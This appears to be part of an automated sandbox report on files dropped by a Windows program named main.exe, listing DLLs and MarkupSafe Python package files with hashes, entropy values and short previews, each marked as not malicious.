                                                                                                                                                                                                                                                                              SHA1:1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
                                                                                                                                                                                                                                                                              SHA-256:A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
                                                                                                                                                                                                                                                                              SHA-512:8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                                                                              Entropy (8bit):5.262055670423592
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
                                                                                                                                                                                                                                                                              MD5:18D2D96980802189B23893820714DA90
                                                                                                                                                                                                                                                                              SHA1:5DEE494D25EB79038CBC2803163E2EF69E68274C
                                                                                                                                                                                                                                                                              SHA-256:C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
                                                                                                                                                                                                                                                                              SHA-512:0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):36352
                                                                                                                                                                                                                                                                              Entropy (8bit):5.913843738203007
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
                                                                                                                                                                                                                                                                              MD5:EF472BA63FD22922CA704B1E7B95A29E
                                                                                                                                                                                                                                                                              SHA1:700B68E7EF95514D5E94D3C6B10884E1E187ACD8
                                                                                                                                                                                                                                                                              SHA-256:66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
                                                                                                                                                                                                                                                                              SHA-512:DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                                                                                              Entropy (8bit):4.735350805948923
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
                                                                                                                                                                                                                                                                              MD5:3B1CE70B0193B02C437678F13A335932
                                                                                                                                                                                                                                                                              SHA1:063BFD5A32441ED883409AAD17285CE405977D1F
                                                                                                                                                                                                                                                                              SHA-256:EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
                                                                                                                                                                                                                                                                              SHA-512:0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):22528
                                                                                                                                                                                                                                                                              Entropy (8bit):5.705606408072877
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
                                                                                                                                                                                                                                                                              MD5:FF33C306434DEC51D39C7BF1663E25DA
                                                                                                                                                                                                                                                                              SHA1:665FCF47501F1481534597C1EAC2A52886EF0526
                                                                                                                                                                                                                                                                              SHA-256:D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
                                                                                                                                                                                                                                                                              SHA-512:66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):70656
                                                                                                                                                                                                                                                                              Entropy (8bit):6.0189903352673655
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
                                                                                                                                                                                                                                                                              MD5:F267BF4256F4105DAD0D3E59023011ED
                                                                                                                                                                                                                                                                              SHA1:9BC6CA0F375CE49D5787C909D290C07302F58DA6
                                                                                                                                                                                                                                                                              SHA-256:1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
                                                                                                                                                                                                                                                                              SHA-512:A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):770560
                                                                                                                                                                                                                                                                              Entropy (8bit):7.613224993327352
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
                                                                                                                                                                                                                                                                              MD5:1EFD7F7CB1C277416011DE6F09C355AF
                                                                                                                                                                                                                                                                              SHA1:C0F97652AC2703C325AB9F20826A6F84C63532F2
                                                                                                                                                                                                                                                                              SHA-256:AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
                                                                                                                                                                                                                                                                              SHA-512:2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):26112
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8551858881598795
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
                                                                                                                                                                                                                                                                              MD5:C5FB377F736ED731B5578F57BB765F7A
                                                                                                                                                                                                                                                                              SHA1:5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
                                                                                                                                                                                                                                                                              SHA-256:32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
                                                                                                                                                                                                                                                                              SHA-512:D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):84992
                                                                                                                                                                                                                                                                              Entropy (8bit):6.064677498000638
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
                                                                                                                                                                                                                                                                              MD5:8A0C0AA820E98E83AC9B665A9FD19EAF
                                                                                                                                                                                                                                                                              SHA1:6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
                                                                                                                                                                                                                                                                              SHA-256:4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
                                                                                                                                                                                                                                                                              SHA-512:52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                              Entropy (8bit):4.675380950473425
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
                                                                                                                                                                                                                                                                              MD5:44B930B89CE905DB4716A548C3DB8DEE
                                                                                                                                                                                                                                                                              SHA1:948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
                                                                                                                                                                                                                                                                              SHA-256:921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
                                                                                                                                                                                                                                                                              SHA-512:79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                              Entropy (8bit):4.625428549874022
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
                                                                                                                                                                                                                                                                              MD5:F24F9356A6BDD29B9EF67509A8BC3A96
                                                                                                                                                                                                                                                                              SHA1:A26946E938304B4E993872C6721EB8CC1DCBE43B
                                                                                                                                                                                                                                                                              SHA-256:034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
                                                                                                                                                                                                                                                                              SHA-512:C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1503
                                                                                                                                                                                                                                                                              Entropy (8bit):5.133773234982206
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:zUnzuObOVprYFT7JPprYFTsQYl9BiZ9ws43z5EBkuFN8WROm32si/yxtafyQ3toC:pIOVprYJNprYJSAD743LG32sQEtXQ3tf
                                                                                                                                                                                                                                                                              MD5:779964CD6648AA66466FB0D1A9629339
                                                                                                                                                                                                                                                                              SHA1:FC9C6859D60126F53FEC0DC6C145063013C30724
                                                                                                                                                                                                                                                                              SHA-256:4631EC0DB5FD90A547E336817264C6798214338146F8AC94B4A57F96EE8C9EC4
                                                                                                                                                                                                                                                                              SHA-512:6728DF7E3CED050809E1DEFF9573D838A846E1B01D00F7B49386A657C4F887A0E14CDF5DE91A7E1498647E3D452D0664381B4F9A02CC56A8EDE892FE11614D33
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Copyright 2010 Pallets....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions are..met:....1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer.....2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution.....3. Neither the name of the copyright holder nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.."AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A..PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL TH
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4067
                                                                                                                                                                                                                                                                              Entropy (8bit):5.213437409146375
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:DU/JnBVJrYJtJrYJdM3a38lq42UkUQIQs0rEVmhTdYSkQbUY:8HnrsPrsdM3a3cqnjY0w0hTGSkQD
                                                                                                                                                                                                                                                                              MD5:60CC921B7461A060DAB0456B6EFFFA68
                                                                                                                                                                                                                                                                              SHA1:6300AA77A908333E3B1FF3EAB7D21CAAD23A2816
                                                                                                                                                                                                                                                                              SHA-256:9E1A1A6E3BA9046E358FF2713C2277CA582B67A171F2830215B88B17D29A7EA7
                                                                                                                                                                                                                                                                              SHA-512:5F82B171ECDE9CB7D0272B324B4364F9B7D5A36980D1C7F7927E5DEE8E3609C856EF4EB5A1570BDB81468A690FDEE4C7B53AD0DFA0872B1503C61E3CB5CA6011
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1..Name: MarkupSafe..Version: 3.0.2..Summary: Safely add untrusted strings to HTML/XML markup...Maintainer-email: Pallets <contact@palletsprojects.com>..License: Copyright 2010 Pallets.. .. Redistribution and use in source and binary forms, with or without.. modification, are permitted provided that the following conditions are.. met:.. .. 1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer... .. 2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution... .. 3. Neither the name of the copyright holder nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1095
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8868247049574105
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:p30n/2zDe0vCWPG0YJK/n0gw0IB0lWwk7q7Gq5DtC4ntjYR2oHlFw9gVStvWJV:J0nuXe0aWPG0+qn0gw0K0lQQRq4t0R2i
                                                                                                                                                                                                                                                                              MD5:3CB854C46E9DECE3E932DE4FCF4A2780
                                                                                                                                                                                                                                                                              SHA1:C7E7962F9BA09AEC237A2F9A4C214DCAC25B2142
                                                                                                                                                                                                                                                                              SHA-256:430B80979C73C53C64201BB5A0FC5C63845ABFDFBA29EA03CEB836B6ED77992D
                                                                                                                                                                                                                                                                              SHA-512:393C112444D075476A05B60A698210F70D0E336633B4365CA85C01AEAB6B89488832F12F3C3BA1D18C8E5845C1D4D480C81E58FDFF0DB459A6B3BDBDBE313C02
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MarkupSafe-3.0.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..MarkupSafe-3.0.2.dist-info/LICENSE.txt,sha256=RjHsDbX9kKVH4zaBcmTGeYIUM4FG-KyUtKV_lu6MnsQ,1503..MarkupSafe-3.0.2.dist-info/METADATA,sha256=nhoabjupBG41j_JxPCJ3ylgrZ6Fx8oMCFbiLF9Kafqc,4067..MarkupSafe-3.0.2.dist-info/RECORD,,..MarkupSafe-3.0.2.dist-info/WHEEL,sha256=tE2EWZPEv-G0fjAlUUz7IGM64246YKD9fpv4HcsDMkk,101..MarkupSafe-3.0.2.dist-info/top_level.txt,sha256=qy0Plje5IJuvsCBjejJyhDCjEAdcDLK_2agVcex8Z6U,11..markupsafe/__init__.py,sha256=pREerPwvinB62tNCMOwqxBS2YHV6R52Wcq1d-rB4Z5o,13609..markupsafe/__pycache__/__init__.cpython-311.pyc,,..markupsafe/__pycache__/_native.cpython-311.pyc,,..markupsafe/_native.py,sha256=2ptkJ40yCcp9kq3L1NqpgjfpZB-obniYKFFKUOkHh4Q,218..markupsafe/_speedups.c,sha256=SglUjn40ti9YgQAO--OgkSyv9tXq9vvaHyVhQows4Ok,4353..markupsafe/_speedups.cp311-win_amd64.pyd,sha256=-5qfBr0xMpiTRlH9hFg_7Go9PHi7z5guMzmbbmZI3Xw,13312..markupsafe/_speedups.pyi,sha256=LSDmXYOefH4HVpAXuL8sl7AttLw
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):101
                                                                                                                                                                                                                                                                              Entropy (8bit):5.028731013591746
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAQ3VMSgP+tkKcfxLQLn:RtC12VAWK5NQLn
                                                                                                                                                                                                                                                                              MD5:C45C8E16945267D2E57AB615D7DE704D
                                                                                                                                                                                                                                                                              SHA1:017434CC3950C6E4CDD18C90974AC4002F062D26
                                                                                                                                                                                                                                                                              SHA-256:B44D845993C4BFE1B47E3025514CFB20633AE36E3A60A0FD7E9BF81DCB033249
                                                                                                                                                                                                                                                                              SHA-512:3609FCBB3C9E28003DCA1BCF32EC082146954A75D673AF3B8E27449D9504A4CA197EE1C64F812DF6E6D95BDDAB5160B5EB6C3D61B0FD870701E23FD78B88D600
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (75.2.0).Root-Is-Purelib: false.Tag: cp311-cp311-win_amd64..
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2776134368191165
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:5Pgn:1g
                                                                                                                                                                                                                                                                              MD5:5862354C9FBB5B15204672C79808E25C
                                                                                                                                                                                                                                                                              SHA1:F53E3E1C5D96F0C96145FD9477EA8DBD30ACEB7B
                                                                                                                                                                                                                                                                              SHA-256:AB2D0F9637B9209BAFB020637A32728430A310075C0CB2BFD9A81571EC7C67A5
                                                                                                                                                                                                                                                                              SHA-512:08123B4AC8551787F74F03A452BC0B78D6FFA709C072F9265B4A0D2485CC465CC4667282273415E0841CAAE49565D26CB5AFBF7124E870A26CC89C7CD517FC7A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:markupsafe.
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2348032
                                                                                                                                                                                                                                                                              Entropy (8bit):6.507217190946273
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:49152:GH3voy7XzO1XXKU4aCM7iEPs2UkcEFCkXRKhf:S5S5CbEPs2UkcIR
                                                                                                                                                                                                                                                                              MD5:F915AE75CB21D59B5945B90C65DE2E4F
                                                                                                                                                                                                                                                                              SHA1:C52BE4CE7D8730B86C5D15ABE8E239B4A57423F1
                                                                                                                                                                                                                                                                              SHA-256:B0A0BC66A68AC7DFA2343D904563E644DE76D0AC14AFF0CA87804351977B0C43
                                                                                                                                                                                                                                                                              SHA-512:05FAE28E77026DB9A446238300A226F0AF999B172B77CE80EA41B116174D1BA411FC94E233516527F1DCF53830AC39CDD82997CC3D632FCA4C0A9CEAAF352888
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):264192
                                                                                                                                                                                                                                                                              Entropy (8bit):6.270986211983934
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:EP41y0ekP31Q6SjRI7OghnznLg9uP1+74/LgHmPr9qvZqhLaHLTLrLfqeqwLQH6P:EPv0d1BhnznLg9uP1+74/LgHmPr9qvZ3
                                                                                                                                                                                                                                                                              MD5:61320942BD13D8D5769AC3E6CC391920
                                                                                                                                                                                                                                                                              SHA1:89FB3F6D306846780B8AD134232C90AC9B746DDF
                                                                                                                                                                                                                                                                              SHA-256:72327EFD000B11F16FCFFCA5FA9F33E7C5DF405B1EB1395EC88A8E050879CF4F
                                                                                                                                                                                                                                                                              SHA-512:71D84FD0ACDA95E34669A581AD6D2F588ED18847595F72C023869035F8C1B4478AF9E162DE2B431A8823BAA17EE567CC9B169267EBD891AE61B28D32BB22E6A3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):25088
                                                                                                                                                                                                                                                                              Entropy (8bit):5.6720886655900955
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:jBYwU5ktEr4PpuzosXu1UwYS60IDwFOzID8/gLJE5S:jBYpkyrNzoZ1UwYSEcHD1u
                                                                                                                                                                                                                                                                              MD5:EBFFC55095A9B8EE82BFDB2FE78AA7B9
                                                                                                                                                                                                                                                                              SHA1:F2FC8EF8330F47A43D7A91B5FDDC84F3FFB6E77E
                                                                                                                                                                                                                                                                              SHA-256:E9744D6603DB9183944399EDD29C9C3DBC8F4664AB3339E91FC09A46F3F42A72
                                                                                                                                                                                                                                                                              SHA-512:B982CE5B858FEA5F0E7248D9A9E080359AB4855433D50A70E8A6AB3810DB712C229A9E70AF678983C7F2F4AF97B7E0A92C983CB18F57F1489E1E3DBE82165FF5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):15360
                                                                                                                                                                                                                                                                              Entropy (8bit):5.050327721704098
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:dgVCU10jtgMdVSguynyAQiLR/+J+YcfG/K3oo/ckgUv:dG16jdwL6yALA1cUK3ooXgU
                                                                                                                                                                                                                                                                              MD5:7548521BAED25B71A82A1DEB89D1DB49
                                                                                                                                                                                                                                                                              SHA1:332A8AFFA1EACA353585476FD5971281CF0847AB
                                                                                                                                                                                                                                                                              SHA-256:027B2D38C10C981C4E77BFA525BCA36919617DB470D0F21ED9DB05A11A2E5D88
                                                                                                                                                                                                                                                                              SHA-512:EE7770856FE26E4C917326935E26F585406F7003BEE5BC729C7E6694E74EE9580C4A5F6A4915A29C3537DDACF6FE1282AFC7911B1132E51D915AC9A1A0F4D6BC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):410112
                                                                                                                                                                                                                                                                              Entropy (8bit):6.534151609407411
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:oaR+TV/lPIcJmmV6MBfPN4aoan4f6vSKCKMhNJ/m9g5:oaRqZlPLFZf6anaKGug5
                                                                                                                                                                                                                                                                              MD5:94A8C9A45CEA058A88F262D8BC82890B
                                                                                                                                                                                                                                                                              SHA1:8E915709DBFEA921F15E9BE894EC932D38CE95E2
